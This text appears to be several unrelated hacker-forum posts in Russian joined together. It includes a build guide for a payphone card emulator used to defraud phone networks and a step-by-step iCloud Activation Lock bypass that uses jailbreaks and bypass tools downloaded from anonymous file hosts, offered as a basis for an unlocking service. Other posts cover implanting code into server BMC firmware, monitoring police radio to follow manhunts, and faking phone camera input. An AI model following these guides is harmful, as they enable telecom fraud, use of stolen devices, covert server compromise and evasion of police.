Для эмулирования карточки, необходим чип PIC16F84 или PIC16F83. Русские аналоги, по причине их глючности использовать не рекомендуется! Схема чипа - pic16c84.bmp, а подключать его необходимо по схеме emulator.bmp.

Для тех, кому мало этих сведений, смотри дополнительное описание pic16c84.txt (DOS ака KOИ-8 кодировка).

Сделал? можешь пойти попить кефира (пиво еще рано!) Теперь будем заниматься программатором карточки. В принципе его можно откопать на Mitino BaZaR рублей этак за 300 (если конечно откопаешь), или собрать самому (это тебе обойдется рублей 100).Вот тебе схема программатора - programator.bmp. Все эти файлы находяться вот здесь. Если уж ты сам в электронике не сечешь, поищи друга, разбирающегося в этом. Ну и соответственно описание по программатору:

Разъём COM-порта 25 штырьковый или 9-штырьковый, оба варианта приведены на схеме. Все диоды малогабаритные кремниевые, например КД522. С транзисторами тоже можно проиграться... Светодиод двухцветный или два обычных, зелёный индицирует наличие питания (и создаёт нужную вольтодобавку для питания Upp), а красный наличие напряжения Udd (подачу сигналов на программатор). Можно вообще отказаться от красного светодиода и убрать соответствующий резистор, правда, тогда можно не заметить, что программатор не подключен к компьютеру Крайне не рекомендуется использовать "обычные" стабилизаторы напряжения 7805, 7812, 142ЕH5А, 142ЕH8Б: они потр**ляют слишком большой ток...

Допускается изменение в номиналах резисторов и конденсаторов до 30%. Только рабочее напряжение электролитов должно быть не меньше указанного. Длина кабеля не очень критична. "Земля" указана условная, только для упрощения схемы! "Настоящая" линия GND компьютера находится на выводе SG разъёма COM порта.

P.S. Конечно это все кульно, но есть одно НО. В каждом таксофоне установлен модем, который каждую ночь звонит на станцию и сообщает, кто и куда звонил, номер карточки и сколько на ней было единиц. Чел, который очень помог мне в написании этой статьи, еще не знал этого, за что ему влепили 3 года условно.

Так что будь крайне осторожен!

Все файлы кину на мыло, если надо тогда стучите в асю или в этой теме.

Содержание:​

1.Вступление
-Проблема активации Icloud
-Хронология обхода активации Icloud
-На каких устройствах это возможно сделать

2.Установка Jailbreak
-Подготовка и проверка системы
-Создание загрузочной флешки с джейлбрейком
-Установка jailbreak
-Краткая экскурсия по инструменту cydia

3.Процесс обхода активации Icloud
-Разбор и подбор инструментов для хактивации
-Использование инструментов для хактивации

4.Что нужно знать после обхода Icloud
-Слетела прошивка! Как этого избежать?
-Проблемы с новыми входами в Apple id
-Проблемы с SIM картой и покрытием

5.Итоги

Вступление
Проблема активации Icloud​

Всем привет , сегодня мы разберем все способы обхода активации icloud (хактивация).
Для начала разберемся что такое хактивация: припустим у вас украли apple id или icloud и заблокировали вам телефон.
После перепрошивки мы запускаем и настраиваем заново девайс и видим такую картину:

Но пароля мы не знаем(
Это значит что если мы незнаем пароля , у нас единственный шанс спасти девайс – провести “хактивацию”

Блокировка активации iCloud на iOS - это не та функция, которая вам всегда нужна, но это действительно очень полезная функция для защиты личной информации, когда ваш iPhone потерян или украден. С помощью блокировки активации iCloud владельцы iPhone могут включить функцию «Найти мой iPhone» и заблокировать iPhone / iPad с помощью учетной записи Apple ID владельцев.
Если вы хотите войти в iPhone, вам нужно получить оригинальный Apple ID и пароль для активации iPhone.
Хотя блокировка активации значительно повысила безопасность iPhone / iPad, есть еще один существенный недостаток. Для тех, кто покупает подержанный iPhone или iPad на eBay или у ваших друзей без разблокировки iCloud Activation, это может быть очень сложно обойти активацию iCloud. Так как же обойти активацию iCloud на iPhone?

В общем “хактивация” – это процесс обхода Icloud Activation Lock ,который возникает после перепрошивки устройства на котором привязан Icloud или после отключения режима потери девайса.

Хронология обхода активации Icloud​

Некоторые сервисы используют знания в сфере разблокировки устройств Apple и делают услугу разблокировки устройства на заказ за денюжку.
Возможность обхода активации Icloud зависит от версии iOS и наличия Jailbreak.
Процесс обхода активации iCloud состоит из таких этапов:

-Подготовка девайса (Сохранение бекапов важных данных)​

-Выбор джейлбрейка и софта для обхода активации​

-Установка джейлбрейка​

-Обход активации iCloud​

На каких устройствах это возможно сделать​

Блокировка Icloud почти во всех случаях происходит на iPhone и iPad.
Сперва разберемся какая у нас версия ios на девайсе , для этого мы будем использовать инструмент 3utools.
Cкачать 3utools: https://url.3u.com/zmAJjyaa

После запуска инструмента подключаем устройство к пк.
Если устройство не подключилось:

-Установите драйвера, нажмите на кнопку “Исправить драйвер”
-Проверьте USB кабель и порт к котором подключен девайс
После удачого подключения мы видим такой интерфейс с информацией об устройстве:

Далее исходя из версии iOS мы будем выбирать рабочий джейлбрейк и софт для обхода активации Icloud.

Установка Jailbreak
Подготовка и проверка системы​

Для проверки наличия Jailbreak на вашую версию IOS, переходим на сайт https://ipsw.guru/jailbreak/

Выбираем:
-Устройство
-Модель устройства
-Версию iOS

Сервис выдаст нам Jailbreak который нам подойдет , информацию об нем и источник где можно его скачать.
Или с помощью инструмента 3utools:
-Подключаем устройство к пк и заходим в главное меню 3utools.

-Кликаем в нижней панели на “Jailbreak”
Теперь софтина покажет нам какие jailbreak есть на нашу систему и предоставит файлы для скачивания.

Создание загрузочной флешки с Jailbreak-ом​

Одним из известных инструментов для процесса jailbreak является Checkra1n.
Checkra1n - это инструмент для производства jailbreak, который работает на устройствах с процессором A5-A11.
Мы будем использовать именно его, потому что он работает почти на всех версиях iOS , он стабильный и он очень легкий в установке.

Установка происходит так:
-Мы загружаем iso образ инструмента Cheakrain
-Через инструмент Rufus записываем iso образ на флешку
-Запускаемся с флешки

Сперва нам нужно флешку (подойдет даже на 2-4гб)
Далее скачиваем с сайта iso образ https://github.com/asineth0/checkn1x/releases
Скачиваем инструмент Rufus https://rufus.ie/ru/
Теперь вставляем флешку в пк и открываем инструмент Rufus:
Форматируем накопитель и переходим в раздел выбора накопителя и iso образа.

Выбираем накопитель и iso образ Cheakrain.

После удачной записи , мы можем вынуть флешку и запустится с нее через boot режим.
Для входа в boot режим , нам надо вставить флешку в пк и параллельно с запуском пк нажимать определённую клавишу до того момента пока он не войдет в boot режим.
Клавиши входа в boot режим а разных устройствах:

• Моноблоки и ноутбуки HP — клавиша F9 или Esc, а затем — F9
• Ноутбуки Dell — F12
• Ноутбуки Samsung — Esc
• Ноутбуки Toshiba — F12
• Материнские платы Gigabyte — F12
• Материнские платы Intel — Esc
• Материнские платы Asus — F8
• Материнские платы MSI — F11
• AsRock — F11

Установка jailbreak​

После того как мы запустились с системы которая установлена на флешке , мы можем увидеть такую картину:

Теперь подключаем устройство а которое будем устанавливать jailbreak к пк.

И нажимаем кнопку ”Start”
Теперь нам нужно ввести устройство в режим DFU и кликаем “Start”.
Теперь после этого устройство перегрузится и мы получим уже готовый девайс c джейлбрейком!

Краткая экскурсия по инструменту cydia​

(Если устройство заблокировано Icloud-ом , тогда мы не сможем пользоваться приложениями установленными на нем , но после обхода активации iCloud , мы сможем использовать девайс как новый)

Cydia - это альтернативный магазин приложений для устройств с прошивкой jailbreak. Он предоставляет возможность устанавливать приложения, твики (модификации) и расширения, которые не доступны в официальном App Store.

Краткая экскурсия по использованию Cydia:
После установки jailbreak и запуска Cydia на вашем устройстве, вы увидите главный экран Cydia с различными вкладками.
На вкладке "Home" (Главная) вы найдете рекомендуемые и популярные приложения и твики. Здесь вы можете найти интересные приложения для установки.
Вкладка "Sections" (Разделы) предлагает категоризированный список приложений и твиков. Вы можете искать в нужных разделах для нахождения приложений по категориям, таким как Темы, Улучшения интерфейса, Инструменты и другие.
Если вы знаете название определенного приложения или твика, вы можете воспользоваться поиском, который находится внизу главного экрана Cydia. Введите название и найдите его в результате поиска.
После выбора приложения или твика, вы увидите страницу с описанием, обзорами, версиями и другой полезной информацией. Нажмите на кнопку "Install" (Установить) или "Purchase" (Купить), чтобы начать процесс установки.
Когда установка завершится, приложение или твик будет доступно на вашем устройстве. Некоторые приложения и твики могут требовать настройки или активацию. Обратитесь к документации или инструкции разработчика для получения дополнительной информации.
Вы также можете управлять установленными приложениями и твиками в разделе "Installed" (Установленные). Здесь вы можете просматривать, обновлять или удалять приложения и твики.

Процесс обхода активации Icloud
Разбор и подбор инструментов для хактивации​

Теперь мы имеем готовое устройство к процедуре обхода активации, зависимо от версии iOS мы будем искать подходящий софт.

Версию iOS мы можем узнать с помощью инструмента 3utools:
-Открываем инструмент 3utools
-Подключаем устройство к пк
В главном меню мы увидим версию iOS которая установлена на устройстве.

В нашем случае мы будем использовать несколько популярных инструментов:

FRP iCloud Bypass Tool

Этот инструмент работает с iOS 12 – 13.4

У него есть функция обхода ICloud на iOS 12.3-13.2.3 (с риском не работающей SIM и без возможности входа в apple id)
И обхода ICloud на iOS 13.3-13.4 c фиксом всех упомянутых проблем после хактивации.
Скачать: https://anonfiles.com/7dM6d3zdzd/FRPFILE_iCloud_Bypass_tool_v2_1_zip

iRemove Tools
Версии iOS c которыми работает этот инструмент:

Также некоторые версии iOS не требуют наличия jailbreak.
Скачать: https://anonfiles.com/Lf58qbzez7/iRemoveTools_6_2_6_win_zip

Использование инструментов для хактивации​

FRP iCloud Bypass Tool

-Подключаем девайс к ПК (установите драйвера заранее, это можно сделать с помощью инструмента 3utools)
-Открываем инструмент (iOS13iCloudBypass.exe)

Тут мы увидим два сценария обхода активации iCloud:
Обход активации iCloud на устройствах с iOS 12.3 – 13.2.3 (возможен риск проблем со входом в Apple id и SIM картой)
Обход активации iCloud на устройствах с iOS 13.3 – 13.4 (с фиксом проблем)
(Исходя из нашей версии iOS , кликаем на подходящий нам вариант)

Теперь наше устройство перезагрузится , и мы увидим начальный экран iphone/ipad, поздравляю! Вы воскресили кирпич!

iRemove Tools
-Устанавливаем iTunes (https://www.apple.com/ua/itunes/)
-Открываем инструмент (iRemove Tools.exe)
-Подключаем устройство к пк

После подключения мы увидим такую картину:

Инструмент выдаст нам информацию про девайс и про его iOS.
(Также инструмент проверит наличие Jailbreak и предоставит мануал по его установке)
Теперь нажимаем кнопку “Start”
Теперь наше устройство перезагрузится , и мы увидим начальный экран iphone/ipad, поздравляю! Вы воскресили кирпич!

Что нужно знать после обхода Icloud
Слетела прошивка! Как этого избежать?​

Самая распространенная проблема после хактивации – это сбой прошивки или той самой активации после перезагрузки или отката устройства к заводским настройкам.

Важно помнить что некоторые джейлбрейки работают только до перезагрузки, так что после перезагрузки он может слететь , и вы не сможете юзать его функции и инструмент cydia. Но после сбоя джейлбрейка в 80% случаях устройство будет работать корректно , то есть не требуется снова проводить хактивацию.
В случае с откатом устройства до заводских настроек могут быть проблемы со восстановлением системе к адекватной роботе , то есть возможен риск того что устройство снова захочет вводить iCloud. Чтобы этого избежать , перечитывайте имеют ли инструменты которыми вы проводите хактивацию или джейлбрейк функцию патча этой проблемы.
В худшем случае когда вы опять увидели экран ввода кредов от iCloud, повторяйте все манипуляции для обхода активации, установка джейлбрейка и хактивация с помощью подходящего инструмента.
Чтобы избежать всех выше упомянутых проблем , изучайте инструменты и мануалы по их использованию , имеют ли они защиту от таких нюансов.

Проблемы с новыми входами в Apple id​

После успешного обхода активации iCloud есть несколько важных вещей, о которых нужно помнить:
Apple ID и новые входы: После обхода активации iCloud вы все еще можете столкнуться с проблемами при попытке войти в Apple ID на устройстве. Некоторые функции, такие как скачивание приложений из App Store или использование некоторых сервисов Apple, могут быть недоступными. Это связано с тем, что обход активации iCloud является нарушением политики безопасности Apple, и они принимают меры для предотвращения несанкционированного доступа.
Эта проблема может возникнуть при использовании инструментов которые не имеют возможности полной перепрошивки девайса.

Проблемы с SIM картой и покрытием​

После процесса “хактивации” мы можем заметить одну проблему – девайс не видит sim карту , это связано перепрошивкой или защитой apple от обхода активации iCloud.
Чтобы избежать этой проблемы , перечитывайте мануалы по использованию инструментов для хактивации.

Итоги​

Во-первых, мы осознали, что проблема активации iсloud является актуальной и интересной для многих пользователей. Отслеживая хронологию развития методов обхода активации iсloud, становится понятно, что данная тема постоянно развивается и изменяется.

Во-вторых, мы выяснили, что обход активации iсloud возможен на определенных устройствах. В основном это старые модели iPhone и iPad, которые имеют уязвимости, позволяющие осуществить процесс хактивации. Однако, важно отметить, что процедура обхода активации является нарушением политики Apple и может привести к ограничениям и проблемам в дальнейшем использовании устройства.

В третьем разделе мы подробно рассмотрели процесс установки Jailbreak и его роль в хактивации iсloud. Мы ознакомились с шагами подготовки и проверки системы, создания загрузочной флешки с джейлбрейком и процессом самой установки. Также мы предоставили краткую экскурсию по инструменту Cydia, который является своеобразным центром приложений для устройств с джейлбрейком.

В разделе "Процесс обхода активации iсloud" мы описали основные шаги, которые необходимо предпринять для успешной хактивации. Мы рассмотрели различные инструменты, используемые при обходе активации iсloud, и описали их функциональность и возможности. Важно отметить, что хактивация iсloud может быть сложной процедурой, требующей определенных знаний и навыков, и должна быть осуществлена с осторожностью.

В разделе "Что нужно знать после обхода iсloud" мы обратили внимание на потенциальные проблемы, с которыми пользователь может столкнуться после успешной хактивации. Мы описали, как избежать сброса прошивки, которая может возникнуть в результате неправильных действий или обновлений. Также мы указали на возможные проблемы с новыми входами в Apple ID и проблемы с SIM-картой и покрытием, которые могут возникнуть после хактивации.
(Надеюсь моя статья многим помогла спасти свой девайс или открыть небольшой сервис)

Автор: Gufi
Сделано специально для xss.is!

Попадались неоднократно посты о том что умные станции Яндекс все передают и стали опорой уже не одной тысячи уголовных делю

Spoiler: Изображение

Суть в том, попадались ли вам реальные кейсы с реестра уголовных дел, или что- то около того, где в деле лежали +- протоколы / распечатки. Какие-то пруфы попадались кому-то? Или кто-то достоверно мб слышал что про это.

Знаю Яндекс все-все хранит и передает по запросу, но вот подпадает ли этот случай?

в основном все статьи про удалённое управление серверами заполнены маркетинговым буллщитом и минимумом реально полезной информации, я постараюсь объяснить, что это и зачем, с точки зрения хакера, а также добавлю некоторые технические подробности, которых или в принципе нигде нет, или которые нужно собирать по крупицам по всему Интернету.

0. we need to go deeper

а точнее, ликбез, что такое BMC ( https://en.wikipedia.org/wiki/Baseboard_Management_Controller )

BMC ("baseboard management controller") - это отдельный процессор (преимущественно ARM) на материнской плате сервера, со своей собственной оперативной памятью и хранилищем, своим отдельным сетевым портом RJ45 и своей операционной системой (преимущественно Linux). по сути это отдельный маленький сервер, установленный внутри каждого "большого" сервера, как будто вы засунули Raspberry Pi в свой системный блок, но с одним нюансом: уровень доступа BMC к серверу - безграничный, в отличие от какой-нибудь внешней малины.
BMC подключён (имеет доступ к) почти ко всем компонентам сервера - по линиям PCI(e), USB, I2C, SMBUS, и иногда даже имеет прямой доступ к оперативной памяти сервера (DMA).

блок-схема от Интеля:

чуть более подробная блок-схема от Супермикры:

ещё чуть подробнее:

BMC работает постоянно, даже когда "основной" сервер выключен. BMC имеет доступ к сети (обычно через собственный сетевой порт, но иногда делит один из портов материнки с "основной" операционной системой), и предоставляет удалённое управление сервером по протоколу IPMI ( https://ru.wikipedia.org/wiki/Intelligent_Platform_Management_Interface ). BMC запускает несколько сетевых служб - SSH, telnet, даже вебсервер, и некоторые другие. обычно к BMC подключаются через web GUI браузером.

BMC умеет:
- собирать и показывать пользователю информацию о сервере (модели процессоров, оперативы и другого железа, состояние хардов, установленные платы PCI, данные с сенсоров, потребляемую мощность, и многое другое);
- управлять питанием сервера (включать-выключать, нажимать кнопку Reset);
- обновлять прошивку BIOS/UEFI;
- и самый полезный для клиентов хостинга функционал - предоставлять доступ к клавиатуре, мыши, и экрану сервера через Интернет, как будто вы находитесь прямо перед сервером. вдобавок ещё можно подключать .iso файл с локального компьютера или качать из Интернета (смотри скрины ниже) как будто втыкаешь реальную USB флешку в сервер, и таким образом устанавливать любую операционную систему по своему усмотрению (или грузиться с LiveCD для восстановления убитой системы). выходит, что это - аналог внешней железки IP-KVM, только встроенный в сервер и не требующий подключения к серверу лишних проводов.

IPMI - это название протокола по управлению сервером через интернет, по этому протоколу подключаются к чипу BMC и отправляют ему всякие команды.
так как обычно пользователи из всего функционала IPMI используют только функцию IP-KVM, то эти понятия стали практически взаимозаменяемы: "IPMI = IP- KVM". говоря "IPMI" обычно подразумевают не сам протокол, а именно удалённый доступ типа IP-KVM к серверу через чип BMC, и если хостер в описании дедика пишет "есть IPMI" - это значит, что вы сможете загрузить на сервер свой .iso образ через интернет и установить операционную систему с нуля, а не использовать предустановленную хостером систему из его мутного образа с троянами и бэкдорами.
"прошивка IPMI", или "прошивка BMC" - это тот самый линукс, который запущен на процессоре BMC, использует оперативу BMC, и записывается на флеш память этого BMC.

IP-KVM здорового человека: встроен в сервер

IP-KVM курильщика: пачка USB+VGA кабелей втыкается одной стороной в сервер, другой в специальную стоечную коробку, а стоечная коробка расшаривает сигнал с этих кабелей в Интернет. то есть клиенты хостинга подключаются не напрямую к своему (арендованному) серверу, а к этой коробке.

почему я назвал статью "бэкдором"? если это не очевидно, повторю ещё раз: в вашем сервере стоит дополнительный постоянно работающий сервер с собственной ОС с закрытым исходным кодом, он подключён ко всем элементам материнки, и имеет собственный доступ в Интернет. ничто не мешает ему записывать все нажатия клавиш, которые вы делаете в web GUI, и видеопоток, который вы видите в web GUI, и отправлять эти данные "куда следует", или показывать сохранённые данные при заходе в web GUI со специального дебаг аккаунта, "случайно забытого" в релизной версии прошивки. в некоторых серверах, например HP, BMC имеет прямой доступ к оперативной памяти сервера, и может читать и изменять память незаметно для операционной системы, установленной на сервере ( https://github.com/Synacktiv-contrib/pcileech_hpilo4_service )
никак иначе, кроме как железным бэкдором, подобный функционал назвать невозможно.
внешний IP-KVM, в отличие от BMC/IPMI, подключается к вашему серверу только тогда, когда это нужно (когда вы попросите админов датацентра его подключить). с другой стороны, при использовании внешнего устройства IP-KVM админы датацентра уже точно могут видеть видеопоток с вашего сервера и все ваши нажатия клавиш.

что из этого лучше с точки зрения информационной безопасности - встроенный или внешний IP-KVM доступ - каждый для себя решает сам.

ладно, хватит о грустном, теперь о хорошем: для домашнего использования IPMI - это восхитительная технология, очень рекомендую. я управляю всем своим парком компов удалённо - с ноутбука по вайфаю, лёжа на диване, или через интернет, будучи не дома и подключаясь к домашнему роутеру через VPN.
можно собрать обычный домашний комп на серверной материнке бренда Supermicro*, потому что они поддерживают обычные десктопные комплектующие - ATX блоки питания, четырёхпиновые кулеры, и так далее, и поддерживают работу с не-ECC оперативной памятью. также многие их материнки имеют стандартный десктопный форм-фактор, в отличие от какого-нибудь Dell или HP, где все разъёмы проприетарные (даже под кулеры), и материнки нестандартных форм и размеров, которые невозможно установить в обычный десктопный корпус типа tower.

• • помимо Supermicro некоторые серверные мамки от Lenovo, Asus, Gigabyte, и ASRock тоже можно использовать с обычными десктопными комплектующими.

приведу немного примеров веб-гуя от BMC самых часто используемых в продакшоне серверов - Dell "iDRAC", HP "iLO", и Supermicro "BMC IPMI" (нет своего брендированного названия), и самой часто используемой функции в веб-гуе BMC - загрузка удалённого сервера с файла .iso на локальном компьютере.

Supermicro:

Dell iDRAC:

HP iLO 4:

скриншоты другого функционала, что ещё может среднестатистический BMC/IPMI, вы можете посмотреть вот тут: <https://www.thomas- krenn.com/en/wiki/ASPEED_AST2400_IPMI_Chip_with_ATEN-Software>

кстати, у вас в компе тоже есть аналог BMC, у которого тоже свой процессор, оператива, и доступ в Интернет. этот аналог называется "PCH ", или "чипсет ", но удалённый доступ к нему (по сути к вашему компьютеру) есть только у Intel и у NSA
однако к некоторым компьютерам и ноутбукам "бизнес" серии Intel даёт удалённый доступ ещё и юзеру - посмотрите, есть ли у вас на наклейке от интеля слово "vPro" и гуглите "Intel AMT". но даже если на наклейке нет слова "vPro", и даже если на сайте ark.intel.com в описании вашего процессора указано, что поддержки vPro/AMT нет, то это ещё не значит, что её на самом деле нет во многих процессорах этот функционал есть, но программно выключен, и его можно включить с помощью тулзы "amtactivator".

подробностей насчёт AMD не знаю, не работал с этими процами.

самый большой минус (или плюс? ) BMC состоит в том, что производители серверов не шифруют прошивку на флеш чипе, благодаря чему прошивку можно достать программатором, заразить своим добром, и залить обратно на чип. конечно, для этого необходим физический доступ к серверу, но ведь у сотрудников датацентра, где стоит ваш сервер, этот доступ и так есть

а вот образ прошивки для обновления через web GUI производители шифруют кто во что горазд: некоторые простым AES со вшитым в этот же самый файл ключом (то есть ключ можно достать из прошивки, изменить прошивку, и правильно зашифровать получившийся файл тем же ключом), некоторые не шифруют, но подписывают с помощью RSA или PGP, с приватным ключом, зашитым в сам процессор BMC (то есть распаковать прошивку для изучения содержимого получится, но добавить в неё своё добро и залить через web GUI уже нет), а некоторые особо упоротые производители [из Гуандуна] в качестве прошивки дают нераспаковываемое нерасшифровываемое бинарное месиво (видимо, им есть, что скрывать )

перефразирую: в зависимости от бренда сервера, добавление своего добра в оригинальный файл обновления прошивки для заливки его в BMC через web GUI - это задача от не очень простой до чрезвычайно сложной.

1. hard pr0n

а точнее, подробности о "железе" BMC. фотки специально старался резать криво, чтобы вотермарк XSS не закрывал модели чипов.

сервера бренда HP:

в старых серверах (< gen8) использовалась дополнительная плата с сетевым портом RJ45 для удалённого подключения к BMC, в современных серверах (gen8+) сетевой порт BMC встроен в материнку или BMC делит один из портов с "основной" операционной системой сервера.

используются чипы BMC собственной разработки, называются "iLO" от "integrated Lights-Out", актуальные версии - iLO4 и iLO5.
в 8 поколении серверов на чипе iLO4 указана модель "610107-002" или "531510-003", в серверах 9го поколения используется чип iLO4 "531510-004", обе модели включают в себя одно ядро ARM926EJ 400 MHz архитектуры ARMv5.
серверов 10 и 11 поколения с BMC iLO5 у меня под рукой нет, но гугл говорит, что там используется чип "815393-001-B1", включающий в себя одно ядро ARM Cortex-A9 (800 MHz?) архитектуры ARMv7.

в отличие от серверов других брендов, вместо нормального человеческого линукса на BMC серверов HP запущена RTOS "GreenHills Integrity" https://www.ghs.com/products/rtos/integrity.html

в моём тестовом экземпляре HP gen9 чипу BMC доступно 256 MB (2 Gbit) оперативы Hynix H5TC2G63GFR-PBA 256 MB (2 Gbit)

и 4 GB (32 Gbit) хранилища eMMC Hynix H26M31001HPR. гугл говорит, что в серверах HP gen 10 хранилище тоже объёмом 4 гигабайта.
BIOS/UEFI записан на 25-ый SPI чип MXIC 25L12835F, а также какой-то кусок прошивки BMC записан на такой же SPI чип, стоящий рядом. что именно там хранится - не знаю, ещё не разбирал.

интересно, что прошивка Intel ME записана на собственный отдельный 25-ый SPI чип - Winbond 25Q64FVSIQ
обычно (в серверах других брендов) прошивка ME записана на ту же флешку, что и BIOS/UEFI.

в качестве CPLD используется целый FPGA от Lattice, модель LCMXO2-4000HC

сервера бренда Dell:

в предыдущих поколениях (< gen14) использовался процессор Renesas SH7758 с архитектурой SuperH / SH4
в современных серверах (gen 14-15) используется процессор Nuvoton NPCM750, имеющий два ядра ARM Cortex-A9. что используется в самых свежих gen 16 - не знаю, ещё не сталкивался.
в качестве ОС на обоих видах процессора работает дистрибутив Linux, собранный на основе Yocto Project "Poky" <https://www.yoctoproject.org/software- item/poky/>

также в предыдущих поколениях (< gen13) использовалась дополнительная плата с сетевым портом RJ45 для удалённого подключения к BMC, в современных серверах (gen13+) сетевой порт BMC встроен в материнку.

Dell gen12:

(сетевуху Dell gen14 смотри выше на фотке "IP-KVM здорового человека")

далее только gen14:

BMC доступно целых 512 MB (4 Gbit) оперативы Hynix H5AN4G6NAFR. логи BMC пишутся на 25-ый чип SPI Winbond 25Q32JVSIM или MXIC 25L3233F

прошивка BMC установлена на eMMC Hynix H26M41204HPR 8 GB (64 Gbit) или Micron MTFC8GAKAJCN-1M "JY995" 8 GB (64 Gbit)

BIOS/UEFI хранится на шестнадцатиногом 25-ом SPI чипе Winbond 25Q256JVFQ или MXIC MX25L25673GMI-10G

и опять в качестве CPLD используется FPGA - Lattice LCMXO3LF-4300C

Huawei:

используются чипы BMC собственной разработки - HiSilicon Hi1710, содержащие 1 ядро ARM Cortex-A9 800 MHz.
BMC доступно 256 MB (2 Gbit) оперативной памяти Micron MT41K128M16JT-125, и 128 MB (1 Gbit) хранилища Spansion S29GL01GS10TFI01.
в качестве ОС на BMC запущен дистрибутив Linux, из интересного - web GUI написан на PHP

128 мегабайт под хранилище явно маловато, куда оно ещё может писать логи и другие данные - неизвестно: с верхней стороны материнки ничего похожего на хранилище eMMC или NAND/NOR Flash я не увидел, с обратной стороны материнки виднеется какой-то чип прямо под BMC, но он не похож на флеш чип своим форм- фактором. разбирать сервер я не стал, потому что там гемор - надо снимать сокеты процессоров, чтобы открутить металлическую платформу, к которой крепится материнская плата.
в другом сервере я видел eMMC чип на 8 GB (Hynix H26M41204HPR) расположенный на месте того Spansion-а ~~прямиком из 2007-го~~ , и там было 512 MB оперативы (Micron MT41K256M16TW-107), хотя BMC такой же Hi1710.

BIOS/UEFI скорее всего (я не проверял) записан в этом 25-ом 16-тиногом SPI чипе рядом с чипсетом - "25Q128A"

и тут тоже встречаем старого знакомого Lattice, однако на этот раз FPGA слабоватый, всего 1280 вентилей. китайцы экономят на всём
модель FPGA - LCMXO2-1200UHC

Fujitsu:

тогда как в нормальных серверах используются SPI чипы в форм-факторе SOP/SOIC 8/16-ног, в японско-немецком творении ставят SPI чипы в форм-факторе BGA (с контактами снизу чипа), в моём конкретном экземпляре это MXIC MX25L51245GZ21-10G

процессор BMC: Avago/Emulex SE-SM4310-P02 - удивительный процессор с тремя ядрами разных архитектур, состоит из:
- ядро 1: ARM9 400MHz на котором запущена сама операционная система BMC (в старых серверах - ThreadX, в современных - Linux)
- ядро 2: 32-bit RISC 200MHz "для задач реального времени"
- ядро 3: Atmel 8051 200MHz "Programmable processor for BMC self-test or general purpose"
так как "старого знакомого" FPGA от Lattice на материнке нет, то скорее всего задачи CPLD выполняются вторым или третьим ядром процессора BMC

оператива: 256 MB (2 Gbit) Hynix H5TQ2G63FFR-RDC

где хранится BIOS/UEFI - не знаю. рядом с чипсетом есть парочка восьминогих чипов, но их маркировка не похожа на SPI.

скорее всего биос хранится на вышеуказанном BGAшном чипе MXIC.

Supermicro, Lenovo, Asus, Gigabyte, ASRock, Tyan, Facebook (не шучу), ...:

все эти сервера ~~собираются в одном подвале~~ используют одинаковые чипы BMC от фирмы ASPEED, такие как ASPEED AST2400, AST2500, AST2600.

AST2400: ARMv5 ARM926EJ-S 400 MHz
AST2500: ARMv6 ARM1176JZS 800 MHZ
AST2600: ARMv7 Dual-Core Cortex-A7 1.2 GHz

в моём конкретном экземпляре это AST2400, имеющий 128 MB (1 Gbit) оперативы Winbond W631GG6KB-15
на фоне виднеется совсем слабый FPGA Lattice LCMXO2-640HC

в качестве хранилища используется шестнадцатиногий 25-ый SPI чип MXIC MX25L25635FMI-10G объёмом 32 MB (256 Mbit), BIOS/UEFI записан на восьминогий 25-ый чип Winbond 25Q128FVSG

Речь пойдет о мониторинге радиочастотного эфира. Иными словами – о прослушивании переговоров полиции/скорой помощи/МЧС/охранников и т.д. , а также «прослушке» и записи сигналов от систем сигнализаций и тому подобных вещей. Тема не для школьников, а для тех, кто умеет читать между строк.

Если вы представили себе спец автомобиль наподобие этого, напичканный всевозможными селективными приемниками, «панорамами», блоками РЭБ и т.д. то вынужден разочаровать – ничего сложного и дорогого не потребуется, достаточно приобрести либо самый простой USB DVB-T донгл за 10 баксов, либо более серьезный аппарат, аж за 25..35 баксов (именно его я и рекомендую использовать). Естественно, потребуется ноутбук (можно и стационарник, но это менее удобно). Если же задача будет не только послушать, но и выйти в эфир, то придется заплатить еще 40 баксов сверху (примерно, ссылки дам позже).

Итак, что же мы будем изучать? Так называемые SDR приемники. Если перевести на простой язык – приемник с программным управлением. Обычно подобные вещи стоили невменяемых денег, но благодаря братьям нашим узкоглазым, появилась возможность приобрести простейший приемник за 10 долларов. Пример того, что подойдет (не реклама):

Пользовался я таким несколько лет, вполне вменяемый вариант за смешные деньги. Но он практически не способен работать с частотами ниже 45..30 МГц. Если интересующий вас диапазон выше – берите китайца и не заморачивайтесь. Если же есть желание слышать КВ диапазон, то придется взять RTL-SDR.

https://www.rtl-sdr.com/buy-rtl-sdr-dvb-t-dongles/ (не реклама)

Я его покупал прямо у себя на радиорынке за 30 долларов, с доставкой из Китая он тогда обходился примерно в 27..28 долларов. Разница несущественная, зато ждать не надо было.

Применяемое ПО. Я люблю sdrsharp (http://www.rtl-sdr.ru/category/sdrsharp) (не реклама)

Разобраться с установкой и настройкой элементарно. С использованием тоже.

А теперь у некоторых мог возникнуть вопрос – «А на**я это все надо??? Кого слушать и где???». Отвечаю – это элементарно узнать благодаря радиолюбителям, переходим на сайт Радиосканнер.ру, выбираем «Таблица частот», а потом внизу слева «Частоты по городам» - http://www.radioscanner.ru/base/index.php?action=stats2 (не реклама).

Указанный мной приемник ловит все от 500 кГц до 2,4 ГГц. Проще каждому лично посмотреть свой город и понять, надо ему это или нет. На крайняк - будете его использовать для приема радио ))

Теперь отвечаю на вопрос - «Ну послушали, и что?». У меня в городе менты работают в открытом эфире, как регулировщики, так и районные отделения. Есть частота для объявления планов-перехватов где открытым текстом дают ориентировки на людей (приметы), машины (цвет/марка/номер) и т.д. Полезно, не так ли? ))) Дай Бог конечно, чтобы не пригодилось…

Охрана магазинов – открытым текстом беседуют о подозрительных личностях и т.п., приглашают друг-друга на перекуры ;-)

МЧС – просто иногда любопытно послушать их сводки.

И так далее.

Относительно законности подобных действий – АБСОЛЮТНО ЗАКОННО в Украине и в России (как в других странах не подскажу, изучайте сами). Мы ничего не передаем в эфир, а только слушаем радиоприемник ;-).

P.S. Приемник можно даже не покупать, а воспользоваться так называемым websdr

• радиолюбители ставят приемники и открывают к ним доступ для всех желающих по сети. Посмотреть можно тут - http://www.websdr.org/ (не реклама). Выбирайте диапазоны 130..170 МГц и 400...570 МГц. Это чисто для того, чтобы понять надо оно тебе или нет, интересно или не очень.

Предлагаю делиться информацией о все возможных взломах айфон. Кроме jailbreak.

Собственно вопрос в том какие модели модемов (USB) поддаются пере прошивке?

Приветствую! Может знает кто: можно ли сделать так, чтобы при обращении к камере телефона открывалась галерея и вместо фотографии можно было выбрать картинку? Делал подобное на эмуляторе андроида, но о том, как такое провернуть с телефона, информации так и не нашел.

